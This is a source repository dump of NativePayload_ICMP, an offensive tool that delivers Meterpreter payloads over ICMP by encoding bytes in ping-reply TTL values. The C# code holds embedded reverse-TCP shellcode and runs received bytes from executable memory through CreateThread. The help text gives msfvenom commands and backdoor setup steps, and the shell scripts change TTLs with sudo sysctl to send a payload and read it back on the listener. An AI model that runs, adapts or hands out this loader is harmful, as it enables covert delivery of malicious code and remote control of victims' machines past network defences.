"); 448 | __Bytes[d] = Convert.ToByte(current, 16); 449 | _0_to_2_ = 0; 450 | d++; 451 | current = null; 452 | } 453 | } 454 | } 455 | 456 | tmp_counter++; 457 | tmp_counter++; 458 | 459 | } 460 | Console.WriteLine(); 461 | Console.ForegroundColor = ConsoleColor.Gray; 462 | Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)"); 463 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 464 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 465 | IntPtr hThread = IntPtr.Zero; 466 | UInt32 threadId = 0; 467 | IntPtr pinfo = IntPtr.Zero; 468 | 469 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 470 | WaitForSingleObject(hThread, 0xFFFFFFFF); 471 | 472 | } 473 | } 474 | catch (Exception _main) 475 | { 476 | Console.WriteLine("Main Error: {0}", _main.Message); 477 | Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message); 478 | } 479 | } 480 | 481 | 482 | static Dictionary HexDic = new Dictionary 483 | { 484 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 485 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 486 | 487 | {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108} 488 | ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115} 489 | }; 490 | 491 | static string _HextoDecimal(string hexstring) 492 | { 493 | 494 | string result = ""; 495 | hexstring = hexstring.ToLower(); 496 | for (int i = 0; i < hexstring.Length; i++) 497 | { 498 | char Oonagii = hexstring[hexstring.Length - 1 - i]; 499 | result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " "; 500 | } 501 | return result; 502 | } 503 | 504 | 505 | static string _Ping(string IPAddress_DNSName, int counter) 506 | { 507 | string Final_Dec = ""; 508 | 509 | try 510 | { 511 | 512 | if (counter != 1) { counter = 1; } 513 | 514 | /// Make DNS traffic for getting 
Meterpreter Payloads by nslookup 515 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString()); 516 | ns_Prcs_info.RedirectStandardInput = true; 517 | ns_Prcs_info.RedirectStandardOutput = true; 518 | ns_Prcs_info.UseShellExecute = false; 519 | 520 | 521 | Process nslookup = new Process(); 522 | nslookup.StartInfo = ns_Prcs_info; 523 | nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 524 | nslookup.Start(); 525 | 526 | //string result_Line0 = ""; 527 | string Pingoutput = nslookup.StandardOutput.ReadToEnd(); 528 | string[] All_lines = Pingoutput.Split('\t', '\n'); 529 | 530 | //int PayloadLines_current_id = 0; 531 | foreach (var item in All_lines) 532 | { 533 | if (item.StartsWith("Reply ")) 534 | { 535 | Final_Dec = item.Substring(item.Length - 4); 536 | } 537 | // debug 538 | // Console.WriteLine(item + "\n"+ s); 539 | } 540 | 541 | } 542 | catch (Exception e) 543 | { 544 | 545 | Console.WriteLine(e.Message); 546 | } 547 | return Final_Dec; 548 | } 549 | 550 | public static UInt32 MEM_COMMIT = 0x1000; 551 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 552 | 553 | [DllImport("kernel32")] 554 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 555 | [DllImport("kernel32")] 556 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 557 | [DllImport("kernel32")] 558 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 559 | } 560 | } 561 | -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/NativePayload_ICMP.png 
-------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=1; 5 | temp=""; 6 | tput setaf 7; 7 | echo 8 | echo "NativePayload_ICMP.sh Download Payload by ICMPv4 Traffic via 'TTL' "; 9 | echo "NativePayload_ICMP v1.0 , Published by Damon Mohammadbagher 2017-2018 "; 10 | tput setaf 9; 11 | if [ "$1" == $'help' ] ; 12 | then 13 | echo 14 | echo "step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext \"your text or string\""; 15 | echo "step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen \"w.x.y.z\""; 16 | echo "Note: in step1 you should use Client-side system w.x.y.z IPv4Address"; 17 | echo 18 | fi 19 | 20 | if [ "$1" == $'shtext' ] ; 21 | then 22 | #textpayload=`echo $2$'\157' | xxd -p` 23 | textpayload=`echo -n $2 | od -A n -t x1` 24 | ttlpayload=""; 25 | mytemp=""; 26 | echo 27 | echo "[!] your payload Text:" $2; 28 | echo "[!] 
your payload bytes:" $textpayload; 29 | for pay in `echo $textpayload | xxd -c 1` 30 | do 31 | case $pay in 32 | 0) 33 | if [ "$mytemp" != $'0' ] ; 34 | then 35 | ttlpayload+="100" 36 | fi 37 | ;; 38 | 1) 39 | if [ "$mytemp" != $'1' ] ; 40 | then 41 | ttlpayload+="101" 42 | fi 43 | ;; 44 | 2) 45 | if [ "$mytemp" != $'2' ] ; 46 | then 47 | ttlpayload+="102" 48 | fi 49 | ;; 50 | 3) 51 | if [ "$mytemp" != $'3' ] ; 52 | then 53 | ttlpayload+="103" 54 | fi 55 | ;; 56 | 4) 57 | if [ "$mytemp" != $'4' ] ; 58 | then 59 | ttlpayload+="104" 60 | fi 61 | ;; 62 | 5) 63 | if [ "$mytemp" != $'5' ] ; 64 | then 65 | ttlpayload+="105" 66 | fi 67 | ;; 68 | 6) 69 | if [ "$mytemp" != $'6' ] ; 70 | then 71 | ttlpayload+="106" 72 | fi 73 | ;; 74 | 7) 75 | if [ "$mytemp" != $'7' ] ; 76 | then 77 | ttlpayload+="107" 78 | fi 79 | ;; 80 | 8) 81 | if [ "$mytemp" != $'8' ] ; 82 | then 83 | ttlpayload+="108" 84 | fi 85 | ;; 86 | 9) 87 | if [ "$mytemp" != $'9' ] ; 88 | then 89 | ttlpayload+="109" 90 | fi 91 | ;; 92 | a) 93 | if [ "$mytemp" != $'a' ] ; 94 | then 95 | ttlpayload+="110" 96 | fi 97 | ;; 98 | b) 99 | if [ "$mytemp" != $'b' ] ; 100 | then 101 | ttlpayload+="111" 102 | fi 103 | ;; 104 | c) 105 | if [ "$mytemp" != $'c' ] ; 106 | then 107 | ttlpayload+="112" 108 | fi 109 | ;; 110 | d) 111 | if [ "$mytemp" != $'d' ] ; 112 | then 113 | ttlpayload+="113" 114 | fi 115 | ;; 116 | e) 117 | if [ "$mytemp" != $'e' ] ; 118 | then 119 | ttlpayload+="114" 120 | fi 121 | ;; 122 | f) 123 | if [ "$mytemp" != $'f' ] ; 124 | then 125 | ttlpayload+="115" 126 | fi 127 | ;; 128 | esac 129 | mytemp=$pay; 130 | done 131 | #echo $ttlpayload; 132 | mytemp2=""; 133 | Finalttlpayload=""; 134 | for pay2 in `echo $ttlpayload | xxd -g 0 -c 3 | awk {'print $3'}` 135 | do 136 | if [ "$mytemp2" == "$pay2" ] 137 | then 138 | Finalttlpayload+="253""$pay2"; 139 | fi 140 | if [ "$mytemp2" != "$pay2" ] 141 | then 142 | Finalttlpayload+=$pay2; 143 | fi 144 | mytemp2=$pay2 145 | done 146 | echo 147 | 148 | #echo "your TTL 
payload:" $Finalttlpayload 149 | 150 | # Finalttlpayload=`echo "${Finalttlpayload::-6}"`; 151 | mylength=`echo ${#Finalttlpayload}` 152 | div=3; 153 | length=$((mylength / div)); 154 | 155 | echo "[!] your TTL payload:" $Finalttlpayload; 156 | tput setaf 3; 157 | echo "[!] at least you need ("$length") Times to change TTL value"; 158 | echo "[!] at least you need ("$length "* 2) Ping Request/Response"; 159 | tput setaf 9; 160 | echo "[>] Start Flag , change TTL value to '254' with sleep 5)"; 161 | sudo sysctl net.ipv4.ip_default_ttl=254; sleep 5; 162 | echo "[>] Running sysctl command for change TTL values (Default sleep is 2)"; 163 | echo 164 | 165 | for TTLs in `echo $Finalttlpayload | xxd -p -c 3` 166 | do 167 | string=`echo $TTLs | xxd -r -p` 168 | if [ "$string" != $'' ] && [ "$string" != $'.' ]; 169 | then 170 | echo "sudo sysctl net.ipv4.ip_default_ttl="$string "; sleep 2"; 171 | sudo sysctl net.ipv4.ip_default_ttl=$string; sleep 2; 172 | fi 173 | done 174 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 175 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 2; 176 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 177 | fi 178 | if [ "$1" == $'listen' ] ; 179 | then 180 | while (true) 181 | do 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | ((PingRequest++)); 184 | 185 | string=`ping $2 -c 1 | grep -e ttl= | awk {'print $6'}` 186 | echo 187 | string=`echo $string | cut -d'=' -f2` 188 | 189 | case $string in 190 | 100) 191 | tput setaf 2; 192 | echo "[$Time]" "Dumped Byte via TTL : 0" 193 | if (( $temp != 100 )) ; 194 | then 195 | payload+="0" 196 | fi 197 | ;; 198 | 101) 199 | tput setaf 2; 200 | echo "[$Time]" "Dumped Byte via TTL : 1" 201 | if (( $temp != 101 )) ; 202 | then 203 | payload+="1" 204 | fi 205 | ;; 206 | 102) 207 | tput setaf 2; 208 | echo "[$Time]" "Dumped Byte via TTL : 2" 209 | if (( $temp != 102 )) ; 210 | then 211 | payload+="2" 212 | fi 213 | ;; 214 | 103) 215 | tput setaf 2; 216 | echo "[$Time]" "Dumped Byte via TTL : 3" 217 | if (( 
$temp != 103 )) ; 218 | then 219 | payload+="3" 220 | fi 221 | ;; 222 | 104) 223 | tput setaf 2; 224 | echo "[$Time]" "Dumped Byte via TTL : 4" 225 | if (( $temp != 104 )) ; 226 | then 227 | payload+="4" 228 | fi 229 | ;; 230 | 105) 231 | tput setaf 2; 232 | echo "[$Time]" "Dumped Byte via TTL : 5" 233 | if (( $temp != 105 )) ; 234 | then 235 | payload+="5" 236 | fi 237 | ;; 238 | 106) 239 | tput setaf 2; 240 | echo "[$Time]" "Dumped Byte via TTL : 6" 241 | if (( $temp != 106 )) ; 242 | then 243 | payload+="6" 244 | fi 245 | ;; 246 | 107) 247 | tput setaf 2; 248 | echo "[$Time]" "Dumped Byte via TTL : 7" 249 | if (( $temp != 107 )) ; 250 | then 251 | payload+="7" 252 | fi 253 | ;; 254 | 108) 255 | tput setaf 2; 256 | echo "[$Time]" "Dumped Byte via TTL : 8" 257 | if (( $temp != 108 )) ; 258 | then 259 | payload+="8" 260 | fi 261 | ;; 262 | 109) 263 | tput setaf 2; 264 | echo "[$Time]" "Dumped Byte via TTL : 9" 265 | if (( $temp != 109 )) ; 266 | then 267 | payload+="9" 268 | fi 269 | ;; 270 | 110) 271 | tput setaf 2; 272 | echo "[$Time]" "Dumped Byte via TTL : a" 273 | if (( $temp != 110 )) ; 274 | then 275 | payload+="a" 276 | fi 277 | ;; 278 | 111) 279 | tput setaf 2; 280 | echo "[$Time]" "Dumped Byte via TTL : b" 281 | if (( $temp != 111 )) ; 282 | then 283 | payload+="b" 284 | fi 285 | ;; 286 | 112) 287 | tput setaf 2; 288 | echo "[$Time]" "Dumped Byte via TTL : c" 289 | if (( $temp != 112 )) ; 290 | then 291 | payload+="c" 292 | fi 293 | ;; 294 | 113) 295 | tput setaf 2; 296 | echo "[$Time]" "Dumped Byte via TTL : d" 297 | if (( $temp != 113 )) ; 298 | then 299 | payload+="d" 300 | fi 301 | ;; 302 | 114) 303 | tput setaf 2; 304 | echo "[$Time]" "Dumped Byte via TTL : e" 305 | if (( $temp != 114 )) ; 306 | then 307 | payload+="e" 308 | fi 309 | ;; 310 | 115) 311 | tput setaf 2; 312 | echo "[$Time]" "Dumped Byte via TTL : f" 313 | if (( $temp != 115 )) ; 314 | then 315 | payload+="f" 316 | fi 317 | ;; 318 | 255) 319 | tput setaf 1; 320 | echo "[$Time] ," $c 
":Dumped Finish Flag 'ttl 255' " 321 | 322 | ((c++)); 323 | 324 | if (( $c == 15 )) ; 325 | then 326 | break 327 | fi 328 | ;; 329 | 253) 330 | tput setaf 3; 331 | echo "[$Time] ," $c ":Dumped Double Flag 'ttl 253' " 332 | ;; 333 | esac 334 | 335 | temp=$string; 336 | 337 | tput setaf 9; 338 | echo "Ping Requests:" $PingRequest 339 | echo "your Payload :" $payload 340 | tput setaf 9; 341 | 342 | #final=`echo $payload | xxd -r -p` 343 | 344 | final=`echo -n $payload | od -A n -t x1 | xxd -r -p | xxd -r -p` 345 | echo "your Data : " $final 346 | 347 | sleep 1; 348 | done 349 | fi 350 | 351 | -------------------------------------------------------------------------------- /EBOOK/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_ICMP v2.0 2 | 3 | "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 Released for Ebook. (May 2018 , bug fixed). 4 | 5 | Article step by step : https://www.peerlyst.com/posts/transfer-download-payload-by-icmpv4-traffic-via-ttl-damon-mohammadbagher 6 | 7 | NativePayload_ICMP.exe v2.0 syntax: 8 | NativePayload_ICMP.exe help 9 | 10 | NativePayload_ICMP.sh v1.0 syntax: 11 | step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext "your text or string" 12 | step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen "w.x.y.z" 13 | Note: in step1 you should use Client-side system w.x.y.z IPv4Address 14 | help syntax : ./NativePayload_ICMP.sh help 15 | 16 | # 1.Demo step by step (linux only): 17 | 18 | step 1 (client side with IPv4 192.168.56.10): ./script(for test).sh 19 | 20 | step 1-2 (server side with IPv4 192.168.56.13) : ./NativePayload_ICMP.sh listen 192.168.56.10 21 | 22 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 
23 | 24 | # 2.Demo step by step (linux only): 25 | 26 | step 1 (client side with IPv4 192.168.56.10): ./NativePayload_ICMP.sh shtext "it's all inside of me it's all inside of you ... you will see" 27 | 28 | step 1-2 (server side with IPv4 192.168.56.13) : ./NativePayload_ICMP.sh listen 192.168.56.10 29 | 30 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 31 | 32 | # 3.Demo step by step (windows and linux): 33 | 34 | step 1 (client side with IPv4 192.168.56.10): ./NativePayload_ICMP.sh shtext "it's all inside of me it's all inside of you ... you will see" 35 | 36 | step 1-2 (server side with IPv4 192.168.56.13) : NativePayload_ICMP.exe listen 192.168.56.10 37 | 38 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 39 | 40 | Picture for Demo 2 : 41 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/EBOOK/NativePayload_ICMP.png) 42 | 43 | Picture for Demo 3 : 44 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/EBOOK/NativePayload_ICMP(WindowsLinux).png) 45 | 46 | -------------------------------------------------------------------------------- /EBOOK/old_version/NativePayload_ICMP(old version).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=0; 5 | temp=""; 6 | while (true) 7 | do 8 | Time=`date '+%d/%m/%Y %H:%M:%S'` 9 | ((PingRequest++)); 10 | 11 | string=`ping $1 -c 1 | grep -e ttl= | awk {'print $6'}` 12 | echo 13 | string=`echo $string | cut -d'=' -f2` 14 | 15 | case $string in 16 | 100) 17 | tput setaf 2; 18 | echo "[$Time]" "Dumped Byte via TTL : 0" 19 | if (( $temp != 100 )) ; 20 | then 21 | payload+="0" 22 | fi 23 | ;; 24 | 101) 25 | tput setaf 2; 26 | echo "[$Time]" "Dumped Byte via TTL : 1" 27 | if (( $temp != 101 )) ; 28 | then 29 | payload+="1" 30 | fi 31 | ;; 32 | 102) 33 | tput setaf 2; 34 | echo "[$Time]" "Dumped Byte via TTL : 2" 35 | if (( $temp != 102 )) ; 36 | 
then 37 | payload+="2" 38 | fi 39 | ;; 40 | 103) 41 | tput setaf 2; 42 | echo "[$Time]" "Dumped Byte via TTL : 3" 43 | if (( $temp != 103 )) ; 44 | then 45 | payload+="3" 46 | fi 47 | ;; 48 | 104) 49 | tput setaf 2; 50 | echo "[$Time]" "Dumped Byte via TTL : 4" 51 | if (( $temp != 104 )) ; 52 | then 53 | payload+="4" 54 | fi 55 | ;; 56 | 105) 57 | tput setaf 2; 58 | echo "[$Time]" "Dumped Byte via TTL : 5" 59 | if (( $temp != 105 )) ; 60 | then 61 | payload+="5" 62 | fi 63 | ;; 64 | 106) 65 | tput setaf 2; 66 | echo "[$Time]" "Dumped Byte via TTL : 6" 67 | if (( $temp != 106 )) ; 68 | then 69 | payload+="6" 70 | fi 71 | ;; 72 | 107) 73 | tput setaf 2; 74 | echo "[$Time]" "Dumped Byte via TTL : 7" 75 | if (( $temp != 107 )) ; 76 | then 77 | payload+="7" 78 | fi 79 | ;; 80 | 108) 81 | tput setaf 2; 82 | echo "[$Time]" "Dumped Byte via TTL : 8" 83 | if (( $temp != 108 )) ; 84 | then 85 | payload+="8" 86 | fi 87 | ;; 88 | 109) 89 | tput setaf 2; 90 | echo "[$Time]" "Dumped Byte via TTL : 9" 91 | if (( $temp != 109 )) ; 92 | then 93 | payload+="9" 94 | fi 95 | ;; 96 | 110) 97 | tput setaf 2; 98 | echo "[$Time]" "Dumped Byte via TTL : a" 99 | if (( $temp != 110 )) ; 100 | then 101 | payload+="a" 102 | fi 103 | ;; 104 | 111) 105 | tput setaf 2; 106 | echo "[$Time]" "Dumped Byte via TTL : b" 107 | if (( $temp != 111 )) ; 108 | then 109 | payload+="b" 110 | fi 111 | ;; 112 | 112) 113 | tput setaf 2; 114 | echo "[$Time]" "Dumped Byte via TTL : c" 115 | if (( $temp != 112 )) ; 116 | then 117 | payload+="c" 118 | fi 119 | ;; 120 | 113) 121 | tput setaf 2; 122 | echo "[$Time]" "Dumped Byte via TTL : d" 123 | if (( $temp != 113 )) ; 124 | then 125 | payload+="d" 126 | fi 127 | ;; 128 | 114) 129 | tput setaf 2; 130 | echo "[$Time]" "Dumped Byte via TTL : e" 131 | if (( $temp != 114 )) ; 132 | then 133 | payload+="e" 134 | fi 135 | ;; 136 | 115) 137 | tput setaf 2; 138 | echo "[$Time]" "Dumped Byte via TTL : f" 139 | if (( $temp != 115 )) ; 140 | then 141 | payload+="f" 142 | fi 
143 | ;; 144 | 255) 145 | tput setaf 1; 146 | echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' " 147 | 148 | ((c++)); 149 | 150 | if (( $c == 25 )) ; 151 | then 152 | break 153 | fi 154 | ;; 155 | esac 156 | 157 | temp=$string; 158 | 159 | tput setaf 9; 160 | echo "Ping Requests:" $PingRequest 161 | echo "your Payload :" $payload 162 | tput setaf 9; 163 | final=`echo $payload | xxd -r -p` 164 | echo "your Data : " $final 165 | sleep 1; 166 | done 167 | 168 | -------------------------------------------------------------------------------- /EBOOK/old_version/README.md: -------------------------------------------------------------------------------- 1 | old version 2 | -------------------------------------------------------------------------------- /EBOOK/old_version/finish.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/finish.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 0.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 1.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 2.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 3.png -------------------------------------------------------------------------------- /EBOOK/script(for test).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo sysctl net.ipv4.ip_default_ttl=254; 4 | sleep 5; 5 | TtlPayload="106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100107109106115107105102114102100106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100106113106105102100102114102114102114102100107109106115107105102100107255107106109106112106112102100107103106105106105"; 6 | for pay in `echo $TtlPayload | xxd -p -c 3` 7 | do 8 | str=`echo $pay | xxd -r -p` 9 | if [ "$str" != $'' ]; 10 | then 11 | echo "sudo sysctl net.ipv4.ip_default_ttl="$str "; sleep 2;" 12 | sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2; 13 | fi 14 | done 15 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 16 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 17 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 18 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 19 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 20 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 21 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 22 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 23 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 24 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 25 | sudo sysctl 
net.ipv4.ip_default_ttl=255; sleep 3; 26 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 27 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 28 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 29 | sudo sysctl net.ipv4.ip_default_ttl=255; 30 | echo "Done."; 31 | 32 | -------------------------------------------------------------------------------- /NativePayload_ICMP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Diagnostics; 6 | using System.Data; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace NativePayload_ICMP 10 | { 11 | class Program 12 | { 13 | static string payload = "fc4883e4f0e8cc0000004151415052" 14 | + "51564831d265488b5260488b521848" 15 | + "8b5220488b7250480fb74a4a4d31c9" 16 | + "4831c0ac3c617c022c2041c1c90d41" 17 | + "01c1e2ed524151488b52208b423c48" 18 | + "01d0668178180b020f85720000008b" 19 | + "80880000004885c074674801d0508b" 20 | + "4818448b40204901d0e35648ffc941" 21 | + "8b34884801d64d31c94831c0ac41c1" 22 | + "c90d4101c138e075f14c034c240845" 23 | + "39d175d858448b40244901d066418b" 24 | + "0c48448b401c4901d0418b04884801" 25 | + "d0415841585e595a41584159415a48" 26 | + "83ec204152ffe05841595a488b12e9" 27 | + "4bffffff5d49be7773325f33320000" 28 | + "41564989e64881eca00100004989e5" 29 | + "49bc0200115cc0a8013241544989e4" 30 | + "4c89f141ba4c772607ffd54c89ea68" 31 | + "010100005941ba29806b00ffd56a05" 32 | + "415e50504d31c94d31c048ffc04889" 33 | + "c248ffc04889c141baea0fdfe0ffd5" 34 | + "4889c76a1041584c89e24889f941ba" 35 | + "99a57461ffd585c0740a49ffce75e5" 36 | + "e8930000004883ec104889e24d31c9" 37 | + "6a0441584889f941ba02d9c85fffd5" 38 | + "83f8007e554883c4205e89f66a4041" 39 | + "59680010000041584889f24831c941" 40 | + "ba58a453e5ffd54889c34989c74d31" 41 | + "c94989f04889da4889f941ba02d9c8" 42 | + "5fffd583f8007d2858415759680040" 43 | + "000041586a005a41ba0b2f0f30ffd5" 44 | + 
"575941ba756e4d61ffd549ffcee93c" 45 | + "ffffff4801c34829c64885f675b441" 46 | + "ffe7586a005949c7c2f0b5a256ffd5"; 47 | 48 | public static DataTable Hex_Dec_Table; 49 | 50 | 51 | static string help = "\n"+"NativePayload_ICMP Published by Damon Mohammadbagher"+"\n\n"+"NativePayload_ICMP null ==> PAYLOAD generate auto" + "\n" 52 | + "NativePayload_ICMP null \"ffccab1cd01f0400 ....\" Input your meterpreter payload to making sh file" + "\n\n" 53 | + "example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt" + "\n" 54 | + "note: copy your msfvenom output payloads to 'Payload string' like 'fc4883e4f0e8cc00000415141505265'" + "\n" 55 | + "example step2 c:\\> NativePayload_ICMP.exe null \"Payload string\" > script.sh" + "\n" 56 | + "example step2 c:\\> NativePayload_ICMP.exe null \"fc4883e4f0e8cc00000415141505265\" > script.sh" + "\n" 57 | + "example step3 c:\\> NativePayload_ICMP.exe ipaddress (sending ICMPv4 traffic to this ipaddress by ping" + "\n" 58 | + "example step3 c:\\> NativePayload_ICMP.exe 192.168.1.50" + "\n" 59 | + "example step4 linux side ./script.sh " + "\n" 60 | + "note: after chmod also adding #!/bin/bash to script.sh file , you can run this script in PING Responder system." + "\n\n" 61 | + "note: you should run this script in your linux after step3 for Response to PING traffic from backdoor system" + "\n" 62 | + "note: Backdoor system is win with NativePayload_ICMP.exe and ipaddress for example: 192.168.1.120" + "\n" 63 | + "note: PING Responder system is linux with ./script.sh and ipaddress for example : 192.168.1.50" + "\n" 64 | + "note: PING Responder system is also Meterpreter Listener by ipaddress : 192.168.1.50" + "\n\n" 65 | + "" + "\n" 66 | + "in this case after 1020 ping request and response you have Meterpreter Session by ICMPv4" + "\n" 67 | + "Dumping Payloads by TTL in PING Response..." 
+ "\n" 68 | + "Meterpreter Payload is 510 bytes" + "\n" 69 | + " 510 * 2 = 1020" + "\n" 70 | + " 0 ... 1019 = 1020 Request" + "\n" 71 | + "" + "\n"; 72 | 73 | 74 | static void Main(string[] args) 75 | { 76 | try 77 | { 78 | 79 | 80 | Hex_Dec_Table = new DataTable(); 81 | 82 | Hex_Dec_Table.Columns.Add("Dec", typeof(int)); 83 | Hex_Dec_Table.Columns.Add("Hex", typeof(string)); 84 | 85 | for (int i = 0; i <= 15; i++) 86 | { 87 | if (i <= 9) 88 | { 89 | Hex_Dec_Table.Rows.Add(i, i.ToString()); 90 | } 91 | else if (i >= 10) 92 | { 93 | switch (i) 94 | { 95 | case 10: 96 | { 97 | Hex_Dec_Table.Rows.Add(i, "a"); 98 | } 99 | break; 100 | case 11: 101 | { 102 | Hex_Dec_Table.Rows.Add(i, "b"); 103 | } 104 | break; 105 | case 12: 106 | { 107 | Hex_Dec_Table.Rows.Add(i, "c"); 108 | } 109 | break; 110 | case 13: 111 | { 112 | Hex_Dec_Table.Rows.Add(i, "d"); 113 | } 114 | break; 115 | case 14: 116 | { 117 | Hex_Dec_Table.Rows.Add(i, "e"); 118 | } 119 | break; 120 | case 15: 121 | { 122 | Hex_Dec_Table.Rows.Add(i, "f"); 123 | } 124 | break; 125 | // default: 126 | } 127 | 128 | } 129 | 130 | } 131 | if (args[0].ToUpper() == "HELP") 132 | { 133 | Console.WriteLine(help); 134 | } 135 | else if (args[0].ToUpper() == "NULL") 136 | { 137 | 138 | //// NativePayload_ICMP null ==> PAYLOAD generate auto 139 | //// NativePayload_ICMP null "ffccab1cd01f0400 ...." 
Input your meterpreter payload to making sh file 140 | //// example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt 141 | //// copy your msfvenom output payloads to "Payload string" like "fc4883e4f0e8cc00000415141505265" 142 | //// example step2 c:\> NativePayload_ICMP.exe null "Payload string" > script.sh 143 | //// example step2 c:\> NativePayload_ICMP.exe null "fc4883e4f0e8cc00000415141505265" > script.sh 144 | //// example step3 c:\> NativePayload_ICMP.exe 192.168.1.50 145 | //// example step4 linux side ./script.sh 146 | //// note: after adding #!/bin/bash to script.sh file run that ;) 147 | if (args.Length == 2) { payload = args[1]; } 148 | string ff = ""; 149 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "254" + " ; " + "sleep 1 ; \n"); 150 | 151 | //// sysctl used to changing TTL for ping respnse by ping and ICMPv4 response 152 | //// so i do this by TTL = 100 up tp 115 153 | //// if you want do this by TTL 200 you should change your code here 154 | //// something like this 155 | //// Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + 2 + ss.Remove(0,1) + " ; " + "sleep 2 ; \n"); 156 | //// or you can change this Dic --> HexDic values 157 | //// something like this 158 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 159 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 160 | //// TTL 254 is flag for starting 161 | //// TTL 255 is flag for adding new TTL for new Payload 162 | 163 | for (int i = 0; i < payload.Length; ) 164 | { 165 | 166 | if (i != payload.Length) 167 | { 168 | ff = payload.Substring(i, 1); 169 | string ss = 